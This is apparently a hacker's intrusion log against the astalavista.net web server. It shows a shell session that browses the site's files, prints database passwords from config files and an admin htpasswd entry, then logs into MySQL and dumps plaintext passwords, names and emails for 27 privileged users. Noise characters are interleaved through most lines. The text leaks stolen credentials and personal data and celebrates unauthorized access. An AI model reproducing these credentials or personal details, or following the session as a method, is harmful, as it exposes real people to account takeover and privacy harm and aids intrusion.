[~] Lets take a look there, after all… they are hack-proof, aren’t they?!
3 d- z0 t3 }! z7 ]- T$ O( F8 {; Y
6 S( f- q6 W  H7 _" u8 r: k( L% t[-] Tricky task: Find home dir of astalavista.net, O) ~. S% M% p" d5 c
- k* c" |" H! v; Z- Q6 X
sh-3.2$ ls -la ~astanet
/ U( G5 `: S5 B0 f( l7 Htotal 485 S" `! R2 ^" @, f! B
drwx–x–x  6 astanet astanet 4096 Dec 23 15:55 .2 A" S! `1 _1 J
drwxr-xr-x 14 root    root    4096 Mar 11 17:56 ..( F5 m5 h+ w  a2 q4 W8 q
drwxr-xr-x  2 root    root    4096 Dec 23 16:00 auth
  K  P! m; k, U3 H" L) {-rw——-  1 astanet astanet 3892 Apr 16 12:14 .bash_history0 w1 _8 ~- |4 v
-rw-r–r–  1 astanet astanet   33 Dec 17 21:50 .bash_logout
# n- S' v3 k( l" a-rw-r–r–  1 astanet astanet  176 Dec 17 21:50 .bash_profile
. V' l- v: S- P: J: |. w-rw-r–r–  1 astanet astanet  124 Dec 17 21:50 .bashrc! @% B% O. w9 i7 ^$ q
drwx–x–x  3 astanet astanet 4096 Dec 23 12:18 domains
5 D* z9 M% c( r- s' X; m4 Cdrwxrwx—  3 astanet mail    4096 Dec 23 12:18 imap
* W, @) w/ T: I; Z; idrwx——  2 astanet astanet 4096 Dec 23 12:18 mail
" z" w& b9 W- L* V6 W( D' ]. U* Plrwxrwxrwx  1 astanet astanet   37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html7 m1 [+ h' J) l* J3 ^; K0 s' q
-rw-r—–  1 astanet mail      34 Dec 22 12:41 .shadow! K/ Y4 y/ L! V) f0 g

( |) y( h+ d2 k/ ^) v6 G+ u8 J4 Hsh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
; r: j1 k1 N1 k% k9 Tsh-3.2$ ls -la# f, |6 q/ e+ l, I
total 200. m' R; P' J  f! ~
drwxr-x— 29 astanet apache   4096 Jan  6 13:58 .
. F7 c* U, T0 u* j" L0 g' l; Udrwx–x–x  8 astanet astanet  4096 Dec 23 13:53 ..( q" H! f' D: k( ~; d: H3 c8 w/ e
drwxr-xr-x  3 astanet astanet  4096 Dec 27  2006 _007, E, E" o8 c( p$ ^4 [
drwxr-xr-x  7 astanet astanet  4096 Jan  5  2006 _0mysql8 z8 l$ z/ a$ `$ }6 v
drwxr-xr-x  7 astanet astanet  4096 Dec 22 14:16 链接标记astanet@astalavista.com
) ^0 h$ h6 v) q3 c% Adrwxrwxrwx  2 astanet astanet  4096 Jan  5  2006 backend1 o! {# J$ V7 c, k9 h
drwxr-xr-x  2 astanet astanet  4096 Oct 24  2006 banner
% T# @& V8 I- w/ \  ]2 O' K* f-rw-r–r–  1 astanet astanet 25724 Apr  4  2006 banner.jpg
. F& M' r* `! Fdrwxr-xr-x  2 astanet astanet  4096 Aug 11  2006 config- Y* l& f5 Q+ F7 c2 \; ]& v# W: }
drwxr-xr-x  3 astanet astanet  4096 Jan 12 08:52 cron
& m5 s! T; L, F& h, I+ xdrwxr-xr-x 11 astanet astanet  4096 Jan  5  2006 dvd
) R5 J# q' ^* L8 m2 Q" J* ]-rw-r–r–  1 astanet astanet    36 Jan  5  2006 error.php
8 H% k4 |" ?4 {  }/ F+ H-rw-r–r–  1 astanet astanet  1406 Jan  5  2006 favicon.ico4 t* p2 n: e# f6 w1 ~
drwxrwxrwx  2 astanet astanet  4096 Dec 15  2006 feed
( f9 V) l5 V8 U8 odrwxr-xr-x  3 astanet astanet  4096 Dec  8  2006 flashtour% o. q8 U9 Q! y! i
-rw-r–r–  1 astanet astanet    18 Jan  5  2006 htaccess
9 ^! L& _! `) |9 c5 W; ~3 ?-rw-r–r–  1 astanet astanet   585 Mar 24 14:50 .htaccess6 l0 x& {- b# `7 M1 u% H
-rw-r–r–  1 astanet astanet   398 Jan  5  2006 index1.php& ^$ x# {) k5 x: ~; X
-rw-r–r–  1 astanet astanet  1036 Jan  5  2006 _index.html
* k6 Z) l' Q2 S6 {1 }3 D-rw-r–r–  1 astanet astanet  6880 Dec 23 14:44 index.php6 \8 D+ J: B7 i( @2 A
-rw-r–r–  1 astanet astanet   676 Mar 21  2006 index_redirect.php! ]0 C' ]' Q1 c; T
-rw-r–r–  1 astanet astanet   739 Feb 24  2006 index.swf1 S, J/ n! p+ }
drwxr-xr-x  4 astanet astanet  4096 Oct 18  2006 irc6 T: M+ T3 F3 m$ B4 W" ^
drwxr-xr-x  4 astanet astanet  4096 Aug 11  2006 lang
; }0 L7 h3 y" ddrwxr-xr-x 13 astanet astanet  4096 Sep 21  2006 lib
* N0 g$ s/ }+ Zdrwxr-xr-x  6 astanet astanet  4096 Aug 11  2006 log# K  Z% o4 n  k4 m/ n" f
drwxr-xr-x  2 astanet astanet  4096 Jan 13 14:02 member& Q3 j& s) G5 ^; ~1 _+ f9 @2 {) h2 P
drwxrwxrwx  5 astanet astanet  4096 Jun  4 00:03 memberdata) D5 r- a8 X3 ^! P0 ~4 b  |
drwxr-xr-x  2 astanet astanet  4096 Jan  5  2006 new5 M- s: d! d0 P
-rw-r–r–  1 astanet astanet  7219 Feb 24  2006 pix1.swf
  D& W2 ]7 {$ o( w/ Hdrwxr-xr-x  2 astanet astanet  4096 Oct 27  2006 re
$ w, R$ b$ a# @- ?-rw-r–r–  1 astanet astanet    23 Jan  5  2006 robots.txt
5 X% s/ ^* r2 r9 q8 Q! W  F3 [drwxr-xr-x  3 astanet astanet  4096 Aug 11  2006 rss
6 b5 P# k$ z7 z" D5 g, ~drwxr-xr-x 39 astanet astanet  4096 Dec 13  2007 sources
$ l' M: V9 ]$ _( x9 \+ bdrwxrwxrwx  3 astanet astanet  4096 Feb  2 15:40 temp_com& p8 t5 h" q; a6 ?$ Z
drwxr-xr-x  7 astanet astanet  4096 Aug 11  2006 themes
. d2 H! E1 O- O- q0 N1 Mdrwxr-xr-x  2 astanet astanet  4096 Mar 14  2008 tmp_src; [3 `; j" R6 v
drwxr-xr-x  5 astanet astanet  4096 Aug 11  2006 tpl
2 J; s1 O' z" B- Z1 ^: tdrwxr-xr-x  3 astanet astanet  4096 Sep  7  2006 v2/ X$ ?) w& f/ B; Y' T% C6 e  J0 X
drwxr-xr-x 16 astanet astanet  4096 Jul  5  2006 v2_old3 n/ I, K) j% |: k& ~  Z# L6 \
-rw-r–r–  1 astanet astanet    35 Dec  4  2006 webcash.php
* H. l: R3 H' `3 M- Wdrwxr-xr-x 13 astanet astanet  4096 Sep 21  2006 wiki9 v% W7 w4 J! X3 U- ]
; M5 E: q/ d. _& w& p5 [7 S/ L! }
sh-3.2$ head -20 index.php' t4 `% R4 k+ Q8 ], z8 H
<?PHP6 M2 v/ H3 M  \. a+ m
/**
4 S, x2 p8 U8 L6 |% ^* Mainfile (external) for astalavistaNET v2.0
  |- |; V# `: q( M*
& h7 d/ m& Q$ {7 ~. e+ o* @copyright     Astalavista IT Engineering GmbH5 V4 q. i. ?% R0 v
* @author        Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>
3 F! f0 O! W' {" o* @version       1.0! ]9 y4 @7 n3 W3 I
*/! |# m# ]3 g( z) w' z
2 R6 h# m* j4 c/ Y
        if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {" @$ N) z3 Z! A
                $dontStartSession = false;
; B0 ?* y) `1 z* E) F- O0 b+ l        } else {
) x. N& z; k& |6 ]/ E+ m                $dontStartSession = true;' _6 V! v0 k3 v! @  k
        }
$ U4 L, r/ u8 H2 Y( f1 j        require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);/ ^' x. V& v& G" ~& V/ O& [4 V# a
        require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);
( }: i' C$ b# E; S! T( o7 H        require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);% X% q7 b6 g7 k" a- ^7 J7 M
        require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);0 k" F3 H0 n% }) r! m
+ a  W! Y4 X& H
sh-3.2$ cd config& q1 K' |. Y* j. I. O" Q
sh-3.2$ ls -la
0 {6 N1 @: O' o9 b6 ~! i: O% atotal 32
7 G& p, ~1 X4 |. A: Y4 @drwxr-xr-x  2 astanet astanet 4096 Aug 11  2006 .
! F: [8 V2 h) T9 edrwxr-x— 29 astanet apache  4096 Jan  6 13:58 ..- X: }& r' x) c
-rw-r–r–  1 astanet astanet  987 Aug 11  2006 adm.conf.php
% n# s3 }% B! @, g-rw-r–r–  1 astanet astanet 4937 Dec 23 15:48 com.conf.php
6 T: O" K3 a1 e$ S  W2 s! u-rw-r–r–  1 astanet astanet  913 Aug 11  2006 cron.conf.php
" ]# e- P% x  |" \* ~& ~/ m5 ]-rw-r–r–  1 astanet astanet 1668 Aug 20  2008 ext.conf.php
7 s% \# s, F  a" n( d. T& }-rw-r–r–  1 astanet astanet 2724 May 30  2007 int.conf.php
( ]: ]7 g7 v+ z' @6 h7 i  Y0 V- e& N* c. F8 c+ D5 k' P' E
sh-3.2$ cat com.conf.php3 |5 K/ ]9 x: R7 }, r
[snip]: I( i* {6 O3 B3 `: d% L+ L3 v
//member-database
+ y& A' r- G' ^) b3 F$_CONFIG['db_mem_server']       = ‘localhost’;
* y" N  |( `& S2 g, S* F) n$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;
1 A# z6 N3 l0 Y7 [7 P/ B$_CONFIG['db_mem_user']         = ‘astanet_db’;
/ y& T: r6 W; Y5 H$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;
" }$ y+ Y8 ?" y$_CONFIG['db_mem_debug']        = false; //true or false8 ^# G4 Q' Z# Q. }) _, }. r4 k
//ads-database1 @8 `8 s+ u; [3 w' N
$_CONFIG['db_ads_server']       = ‘localhost’;
) X4 [. `! x0 ]3 q$_CONFIG['db_ads_database'] = ‘astanet_ads’;3 I1 d9 l4 y- l: r* w+ O
$_CONFIG['db_ads_user']         = ‘astanet_db’;* |# w# u) `& v$ q$ }. A* o9 K
$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;
- b2 `# _9 C. _0 m$_CONFIG['db_ads_debug']        = false; //true or false
, K: S* _: R# K) ^* F! |0 n//rainbow-database
0 |1 O! Z: p; ^2 t- g$_CONFIG['db_rainbow_server']   = ‘212.254.194.163′;; }" V8 q7 I4 [2 C: N( e% a/ ^' [! R
$_CONFIG['db_rainbow_database'] = ‘rainbow’;
# U7 N2 Y0 H( `! w2 z$_CONFIG['db_rainbow_user']     = ‘dinu’;
& z# s( C; m8 G" C: [) T$_CONFIG['db_rainbow_password'] = ‘dinudinu’;
7 U! Z9 ]" Q; F' O% ~2 m$_CONFIG['db_rainbow_debug']    = false; //true or false: }$ i. ^4 R5 y! R
//mailing lists database
6 z# j+ K& W4 t; J/ `2 M0 C. ]$_CONFIG['db_mailing_lists_server']     = ‘localhost’;6 E( V/ T. H* t; v: B, V, y
$_CONFIG['db_mailing_lists_database']   = ‘astanet_mailing_lists’;; {7 u0 P. \9 O
$_CONFIG['db_mailing_lists_user']               = ‘astanet_db’;2 V3 f! i+ i1 f' v, p4 j
$_CONFIG['db_mailing_lists_password']   = ‘TXwVrC7hbq’;
! f% G* {2 [0 F$_CONFIG['db_mailing_lists_debug']              = false; //true or false
1 o5 Y7 ~( ]( K//paypal
% s1 ?1 ]5 |& O$ |$_CONFIG['sub_pp_url']          = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;
, h: r' e7 O  P3 w, a8 w$_CONFIG['sub_pp_cmd']          = ‘_xclick’;: v2 _6 S, n( v+ l" }6 g% K
$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;
0 h& [. U/ B* P5 I9 O( [) }% e$_CONFIG['sub_pp_noship']       = ‘1′;
4 i; q( a2 a% ~* Y4 D' U# U$_CONFIG['sub_pp_referer']      = ‘链接标记[url]https://www.paypal.com/[/url]’;
  p" o; G8 H5 v: d3 h) ~$ O) S, x[snip]
( Z/ `6 J- |, ^+ F8 W0 m$ e
' {) C5 q& l1 E  ]sh-3.2$ cd ..& s# z2 @& X  D% d: L% r7 W$ \- S
sh-3.2$ cd member! m/ S( g) m3 `+ C0 p) j5 r
sh-3.2$ ls -la  V$ K8 D2 f2 }6 L+ Q1 q; z
total 20$ `3 _. O& i5 ]
drwxr-xr-x  2 astanet astanet 4096 Jan 13 14:02 .
% d) {! }: v2 H( ]/ Q: w! D' T  udrwxr-x— 29 astanet apache  4096 Jan  6 13:58 ..% ]0 y4 Z8 h, `) R; |7 {
-rw-r–r–  1 astanet astanet   19 Jan 13 14:02 .htaccess
& R9 w1 B* L9 N; ~-rwxr-xr-x  1 astanet astanet 6709 Jan 13 14:06 index.php" M6 I8 D7 q$ E' L+ ^6 Z$ r) A
sh-3.2$ cat .htaccess$ ~% X0 Y; M! e; ^3 g& ^; a
SecFilterEngine off
& e9 b6 O; T1 [. v! J; X" |  b3 T, K$ I$ M7 [3 B
sh-3.2$ cd ..
0 a$ |/ k7 a& e9 Csh-3.2$ cd cron
# i- U( z% u+ h8 v  \: \sh-3.2$ ls -la% S  w" a" S  o* T& {
total 168  Y- O) \( _# Q8 j: L! v; H
drwxr-xr-x  3 astanet astanet  4096 Jan 12 08:52 .  I2 R+ |8 f8 C% E8 Y  a. g
drwxr-x— 29 astanet apache   4096 Jan  6 13:58 ..
# D1 |9 x- ]* |, E5 U* }6 l6 R-rw-r–r–  1 astanet astanet  1272 Jan 12 08:24 0_corefile.php
6 t9 G, K, }- V5 g9 k2 H-rw-r–r–  1 astanet astanet  2356 Aug 11  2006 0_functions.php
. W4 P$ w3 z2 N1 L) j-rw-r–r–  1 astanet astanet  3616 Dec 23 15:44 1_daily.php, i5 ]) a; O( t) Z6 V0 \. r
-rw-r–r–  1 astanet astanet   527 Aug 11  2006 1_fivemin.php3 L4 v" d. i# F4 x" Y7 a
-rw-r–r–  1 astanet astanet  5006 Dec 23 15:39 1_hourly.php
# ^+ ~/ `. o) V$ x- ]) z7 d-rw-r–r–  1 astanet astanet   432 Aug 11  2006 1_weekly.php! n/ ]0 Q% m+ p
-rw-r–r–  1 astanet astanet  2277 Aug 11  2006 2_advertising.php, y& A8 ]+ K, [2 E/ F8 }9 W
-rw-r–r–  1 astanet astanet  4882 Dec 23 15:40 2_archives.php
- C3 T4 O, J$ Y-rw-r–r–  1 astanet astanet  3784 Aug 16  2006 2_awstats.sh
2 B( S3 N1 Q2 ]% \& h- P. W-rw-r–r–  1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php' t8 S- C2 ?5 @
-rw-r–r–  1 astanet astanet 14979 Jan 12 09:10 2_expire.php* U4 M! U7 ^9 t, Y3 S5 S, w
-rw-r–r–  1 astanet astanet  7657 Aug 15  2006 2_exploitree_updater.php
; g8 I; l9 C4 ]8 |) W; q: N-rw-r–r–  1 astanet astanet   686 Dec 23 16:31 2_filesize.sh
5 ?6 r7 R( l9 a3 L-rw-r–r–  1 astanet astanet  9853 Aug 11  2006 2_keywords_old.php$ L1 h* V1 l$ h8 l" c
-rw-r–r–  1 astanet astanet 15664 Sep 22  2006 2_keywords.php+ s8 h$ \3 r7 u" B* z+ ^9 c
-rw-r–r–  1 astanet astanet  1233 Aug 11  2006 2_proxy_checker.php( c" T4 K1 ~+ C* |/ l3 \- t
-rw-r–r–  1 astanet astanet  7558 Aug 11  2006 2_proxy_collector.php0 }( ^) d8 n  i3 g0 v! ~
-rw-r–r–  1 astanet astanet   796 Aug 11  2006 99_create_emails.php
) D% z: H. F- wdrwxr-xr-x  2 astanet astanet  4096 Aug 11  2006 99_lang_email; D1 N4 {6 C3 j$ B# D8 I
-rw-r–r–  1 astanet astanet  9622 Jan  6 16:04 login_reminder.php2 b2 k1 `2 x+ {: r2 }/ [
-rw-r–r–  1 astanet astanet  9620 Jan  6 16:05 login_reminder_test.php
2 w+ s* A. _# f4 B% v; y9 S6 m' y2 X
sh-3.2$ cd ..2 _7 Y* p$ K5 q1 c2 a3 m+ K
sh-3.2$ cd _007/ L8 m* x+ S! }
sh-3.2$ ls -la* X5 I6 ~# ~2 g  z, d9 x  Z; {7 R
total 24
% L: M6 m/ u" Y3 I/ rdrwxr-xr-x  3 astanet astanet 4096 Dec 27  2006 .
# P% {9 `& R* |4 P* F9 bdrwxr-x— 29 astanet apache  4096 Jan  6 13:58 ..
" [2 H+ b2 R- M7 G9 e) y9 I) C-rw-r–r–  1 astanet astanet   96 Dec 23 15:17 .htaccess6 T& |, z: A  F2 ^! C! O/ x
-rw-r–r–  1 astanet astanet 3263 Jan 15  2007 index.php7 e& ?! A6 ^) E6 {0 r
-rw-r–r–  1 astanet astanet   20 Dec 27  2006 info.php
. T; g- Q2 Z5 p; k) @. F5 j  ^drwxr-xr-x  5 astanet astanet 4096 Aug 11  2006 sitemap0 R/ g' q8 {( a

5 E  M: Y7 R' E* Q5 ssh-3.2$ cat  .htaccess0 P& I( ]7 k; j. R" N. v
authType Basic; }0 D, p6 g5 k) O) x
authName Admin! v1 ]% J" |9 t5 h% A2 [6 e+ r
authUserFile /home/astanet/auth/.htadm_pwd
+ V& S4 ]8 N( n+ a5 ^1 P- L1 Drequire valid-user1 S+ h' Q7 }  F- O; A+ T

# h1 [; X  G* Tsh-3.2$ cat /home/astanet/auth/.htadm_pwd6 }& `0 V. o) I4 z% x3 p
admin2net:CR0bl65MwhfT. D" V7 m. f/ L  ]4 w  Q# I

4 c# b( R) ^% d& Ksh-3.2$ mysql -u astanet_db -p
) }% \9 u/ ^/ U7 ~2 I0 t* bEnter password:
. f& {6 T- ^# t/ f) m0 i9 l! pWelcome to the MySQL monitor.  Commands end with ; or \g.
' G$ l1 {- z& M* ?0 f3 LYour MySQL connection id is 275153* X0 D. B8 i' ^. Y9 v
Server version: 5.0.45-community-log MySQL Community Edition (GPL)& i! \! `) a+ N* \. q, u" C7 |

, Y0 }( S. N* D( [' ]4 ?4 Q# u9 HType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.- A  }5 d& `' Z3 o

7 ^- ]) {5 W; e0 @- Bmysql> show databases;
0 c0 a! {, R* P( S+———————–+3 K6 q" j0 I6 h# F& H) S
| Database              |; O9 J8 ?: l+ n* Q6 O
+———————–+: e! T* g4 z6 K1 }: k; V1 C: u6 N  `
| information_schema    |
  p% I3 K# X4 L  v1 l- ]# z| astanet_ads           |
! f7 t, c5 _" m; @/ j  G| astanet_mailing_lists |
9 n: b  I. Y& z! D: J3 l9 e5 _| astanet_mediawiki     |
& v1 R  Q6 {5 j| astanet_membersystem  |3 Y, n. h8 k$ s9 ^
| test                  |
# A- N0 v4 w5 R3 e6 z+———————–+
' J$ x3 Q4 B9 |+ m  J+ i3 h6 rows in set (0.00 sec)) n- u( ~. |! G, E" y% S* r. E1 [
5 u' @. f6 x0 u1 b/ g/ \
mysql> use astanet_membersystem& U! F3 p! h1 h3 v9 a$ |- V3 {
Database changed  k/ Q/ K* Q$ x4 A
mysql> show tables;
& @2 k" A0 _/ y. ~+———————————–+
+ h; |/ V5 V" H6 V, h7 D+ i* I| Tables_in_astanet_membersystem    |# X1 u; |( l3 C# L+ i+ Y. o- _
+———————————–+
% _- Y: h( v2 ~; x! o5 X| blacklist_categories              |
) x' G# D; e  l) W0 A| blacklist_content                 |
( e( w5 E  l' c  A) }1 k+ [| blacklist_levels                  |
" u  C' H: w8 a) ]( q! s| blacklist_mcset                   |
0 ?& Z+ T4 E+ n5 [: p. c+ Y! F| dir_categories                    |
3 U  x( x, j1 g, v7 c% {4 L; I| dir_comments                      |
5 b) Z6 L: Q" U" x8 k| dir_links                         |$ J% X( W8 A8 z4 U( H# W
| dir_temp                          |
0 C# J' J# |* r: u| dir_votes                         |- X1 |3 R- X- ^$ l, J7 g
| documents                         |  r0 S# ^0 F" Z* J( d* _
| documents_categories              |0 t% u4 j& s$ }% J& v0 f6 P7 }* A
| email_content                     |2 f' N5 P3 d4 k# M- _
| email_settings                    |
4 b- ^2 s- Q6 c' {$ c| exploits                          |
; U3 j. m2 p4 f) P6 S4 b# [| exploits_categories               |( o; d! q4 q' U5 O9 L9 _" y3 v  K; K
| exploittree_categories            |+ d* ?: O! o5 W/ Z# `
| exploittree_exploits              |
6 m0 K2 W/ O6 w. i( c8 w| home_values                       |' h$ f  m; n0 ^" d7 U; G, I, r2 T* U
| iso_countries                     |$ b  p+ H4 i+ @: U
| links_categories                  |
3 t) u+ h& E; V; d' _| links_records                     |
5 I6 j; X, W# A) |+ A| links_unauth                      |
3 S; y& L1 |5 H4 N( F# h$ i% g. @| links_votes                       |
: m. ~* r; |- E| log                               |! q# ~/ C* a) j5 m( m$ |
| news_categories                   |$ \5 r3 }; y$ L$ ~
| news_comments                     |: }- N" {3 ^% Q  _3 X$ G8 c; G6 b
| news_emoticons                    |
* Q5 z1 O6 m/ w* i+ `; E| news_latest                       |
2 `5 P5 t1 I) m' G  }  L| news_messages                     |
& B- I) A2 r" u, w3 S( \3 ^: h$ e| news_statistics                   |! _; V$ P5 d# v9 V' _8 I( k1 \1 c' ~
| news_votes                        |: p" X8 M! [$ ?4 z% ^: r3 m
| prices_content                    |
2 h' x3 v8 ?' @4 i| prices_offers                     |
, c' S9 U: E+ J- j" K6 b8 a| rss_settings                      |
4 \6 l5 a4 D% B5 Q+ r$ U| sessions                          |' ~4 m0 v0 l0 I* R$ n* N
| stats_signups                     |
! s& \( C- ~8 w, [| u2u2                              |
1 \3 Q/ w, B0 D8 g9 S| u2u_contact                       |: G- `7 j+ z+ d# F$ m9 u; c
| u2u_settings                      |
6 F6 v  ~" R, x) S$ P+ ?( N| user_keywords_selected_categories |8 c3 q+ i, [7 j" V4 o, P$ n
| users                             |
7 {6 W' m0 |- u: Z# e| users_ipn_test                    |
1 K5 \0 l+ F5 @3 i9 _: j| users_keyword_values              |
. ]2 Y, V, T+ P" l% P6 R# c| users_profile                     |3 x. r7 t+ k+ `+ v1 q
| users_temp                        |
  O! k5 i; r* O" r3 t" C| users_upgrade                     |
7 d2 ], e( T: J9 K3 W- G  j, Y) Z+———————————–+! L# c, o# P/ m1 _0 }
46 rows in set (0.00 sec)
4 E8 t. l- v  v' L& M
6 f! r+ T" @, [2 b# D" j, \mysql> describe users;
+ a8 Q& W7 K+ P6 V. g+ Q+————————–+————————————–+——+—–+———————+—————-+# l- |# ?' `5 t- I( j& b
| Field                    | Type                                 | Null | Key | Default             | Extra          |7 U: P6 M6 E1 z, A
+————————–+————————————–+——+—–+———————+—————-+; _! k) c3 Q: N2 }8 g
| primary_key              | smallint(5) unsigned                 | NO   | PRI | NULL                | auto_increment |
$ F) {1 ^- ~7 \| user                     | varchar(50)                          | NO   |     |                     |                |
: o; M  z( d. m| nickname                 | varchar(30)                          | NO   | MUL | anonymous           |                |
* ?7 K# s' {( T* J5 a. T3 Q| password                 | varchar(30)                          | NO   |     |                     |                |, x7 |, O; q# W4 K8 |# K- ]
| userlevel                | tinyint(3)                           | YES  | MUL | NULL                |                |
5 k7 ~, b: {, s" `! V1 Y| exp                      | int(8) unsigned                      | NO   |     | 0                   |                |3 d# H- _, }7 v; Y8 y" q
| email                    | varchar(50)                          | NO   |     |                     |                |7 n0 p2 F* s5 k5 V
| ip                       | varchar(15)                          | NO   |     | 0                   |                |: m5 h# V4 g8 ]$ m
| proxy                    | set(’0′,’1′)                         | NO   |     | 0                   |                |: a  y7 T4 z" _% `$ h
| logtime                  | timestamp                            | NO   |     | CURRENT_TIMESTAMP   |                |
4 I+ A  h, c. _| login_reminder_last_sent | timestamp                            | NO   |     | 0000-00-00 00:00:00 |                |
6 J' c+ R' k0 d' N6 b| anz_in                   | tinyint(1)                           | NO   |     | -1                  |                |$ M1 D- \- o% [" O& F0 v  ]
| status                   | tinyint(1) unsigned                  | NO   |     | 0                   |                |
5 L/ t' y+ |! P6 p| checked                  | set(’0′,’1′,’2′)                     | NO   |     | 0                   |                |: F% U2 L( C, ~9 Y
| freemember               | set(’0′,’1′)                         | NO   |     | 0                   |                |
& i" Z/ ?: K; H1 T8 T* D2 ]3 L4 c| ordertype                | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES  |     | NULL                |                |; q% B5 J! d; V) W
| lang                     | tinytext                             | NO   |     |                     |                |" L0 I4 v' @1 ~& \3 W: S2 S
| adid                     | smallint(6)                          | NO   |     | 0                   |                |" @% x& i. A7 [8 @
| pp_txn_id                | varchar(255)                         | YES  |     | NULL                |                |
3 @5 r- T9 J. x  E| cnb_transaction_id       | varchar(255)                         | YES  |     | NULL                |                |" I, @8 R- a+ Y- o4 y9 I) |
| cnb_order_id             | varchar(255)                         | YES  |     | NULL                |                |) G( Y% v8 b: k  v" y% |
| cnb_user_id              | int(11)                              | YES  |     | 0                   |                |
6 L- S$ K+ P% ~  s* l' D* e+————————–+————————————–+——+—–+———————+—————-+
& k7 g8 z# Y2 F; m22 rows in set (0.01 sec)
. E; E: W7 S$ }$ ^0 \# D3 J' o$ r
mysql> select count(*) as skids from users;
+ N" p0 U; u% ~; b, L' c+——-+- I& \. S7 B9 d) E% N# C
| skids |
& t6 `6 y" b0 B+——-+
7 h' c0 X2 W) Y! [7 o| 25199 |7 o7 A, S4 {7 @8 |  t  L& [, j$ N
+——-+
" y9 d1 ~* d9 L; r. N5 g1 row in set (0.00 sec)( u, V7 c% _/ |. H0 p+ B5 ^

+ e" M- B8 }& ]  e9 nmysql> select user,nickname,password,email from users where userlevel = 1;; }, X) t4 w6 P0 S! H+ l
+————————–+———————-+——————+———————————–+
1 S9 C2 u% {/ L* [| user                     | nickname             | password         | email                             |1 U. k- l9 t$ X' {7 ^4 c( A3 k
+————————–+———————-+——————+———————————–+
. u5 }, g& M/ j6 z- N- n| pascal                   | prozac               | astaman3         | 链接标记info@astalavista.net              |
8 T, H3 N& m; H( l) W| Ivan Schmid              | rOOtless1            | astalavista4asta | 链接标记ivan.schmid@comvation.com         |
6 c# e' `; n, I# Y5 i. m  P/ P| qreymer                  | Palermo              | qblsw85iam       | 链接标记eche@home.se                      |3 t9 q) k: E1 h& @- {
| Christian Wehrli         | g0atherd             | hitt?74          | 链接标记g0atherd@gmx.net                  |
% S% m4 o9 J$ V+ k5 c| Andrew Blake             | Minky                | liq73uid         | 链接标记a.blake@har.mrc.ac.uk             |0 {/ u8 F/ J0 Y  w% L- z
| Martin Wyss              | dinu                 | kj63;cXy         | 链接标记martin.wyss@astalavista.net       |
5 [/ e. V5 z% V7 Y: i$ {7 r6 k| Leandro Nery             | Timan_no_Sanco       | nery2002         | 链接标记leandronery@hotmail.com           |$ G9 }, b3 c/ E6 L7 s1 p' Z! p$ ?
| shaving ryans privates   | ShavingRyansPrivates | memberboard313   | 链接标记shavingryansprivates1@hotmail.com |
  l7 L; {: e0 d2 T% {| Gerben van der Lubbe     | Spoofed Existence    | Lb59eXg5         | 链接标记spoofedexistence@hotmail.com      |8 Q4 ]# c0 B% L9 N
| David M Lee              | Daremo               | icG12m03         | 链接标记daremo@hackerheaven.com           |$ R. ^/ S" q0 E) ~$ N8 p
| David Corn               | akriel               | ve3uB$cUku       | 链接标记akriel@fallenroot.net             |
1 z8 [5 j2 F4 z& t. l| Thomas Kalin             | Gwanun               | QwErTy123        | 链接标记thomas.kaelin@astalavista.net     |2 b: Y& M2 u2 y$ K  {
| Marcus unknown           | Cra58cker            | hhCr4ck06        | 链接标记unknownmarcus@hotmail.com         |, d% t+ ]7 Y' @) {% A5 Y
| David Ellis              | dellis203            | philip           | 链接标记dellis@nightwatchnss.com          |9 P# H) c* b4 l/ J8 x' r
| Lars Christian Solberg   | xeor                 | tF3s4|Nea        | 链接标记xeor@hush.com                     |( z- x+ \" m- T
| Paulo Santos             | Be1er0ph0r1          | amor01           | 链接标记pmsantos@gmx.ch                   |4 u& G+ Z% {- K$ N5 N( p' H0 q
| Thomas D?ppen            | daha                 | asta4tom         | 链接标记thomas.daeppen@astalavista.ch     |) }# a/ n/ t/ F! T5 m
| Touraj Abbasi Moghaddasi | -Crow1               | NetR0ck          | 链接标记toraj.a.m@gmail.com               |
2 Z: c9 T) f% X3 A0 f% G  P| Fabius Bernet            | traviser             | wellenreiter100  | 链接标记fabius.bernet@astalavista.ch      |
0 N1 }. }' f2 z0 P) s$ E| Zachary McElroy          | duder1               | dirty245dix      | 链接标记mcelroyzj@yahoo.com               |3 ^$ R9 }" d; w$ x0 a' `- W: v
| Leron Cohen              | cohen2               | leron4free       | 链接标记leron@quiredmedia.com             |$ W; k- ^5 x; V
| Beatriz Pontes           | anonymous1656        | pitas            | 链接标记joao.pedro.pontes@gmail.com       |. h9 \$ G- S1 ]  a+ Z3 l( _" M
| Glafkos Charalambous     | anonymous2086        | si99490178$#     | 链接标记nowayout@webhostline.com          |3 n  K- d/ a8 I1 `, e) U2 l. u
| developer COMVATION      | anonymous2402        | Ri?Q$Q$MVU       | 链接标记ivan.schmid@astalavista.ch        |+ C5 \6 X5 D5 _& Z# X6 r; I* v; e
| Peter Fisher             | cyph3r1              | testZer025435    | 链接标记cyph3r@astalavista.com            |( N; o( k7 n, C! C( e4 Y8 u7 g; ^# G
| sykadul                  | sykadul              | ak29eral         | 链接标记sykadul@gmail.com                 |
: Y/ b' Z8 i! _) ]& S. z| Ronny Janzi              | commander1           | mpbdaagf6m       | 链接标记ronny.janzi@astalavista.ch        |: j0 k: |' y2 B) I, F" P
+————————–+———————-+——————+———————————–+
# V3 |. |: ^5 u* ?3 ~( g27 rows in set (0.00 sec)
; a7 B, m5 m$ N' Q
( y# l2 K& U  Smysql> exit;* {9 G: D5 m6 E1 y1 d
Bye$ a9 h9 V  I: F: q
5 x3 `' X# o' _' {. A5 N" g
[~] plaintext passwords? yes,
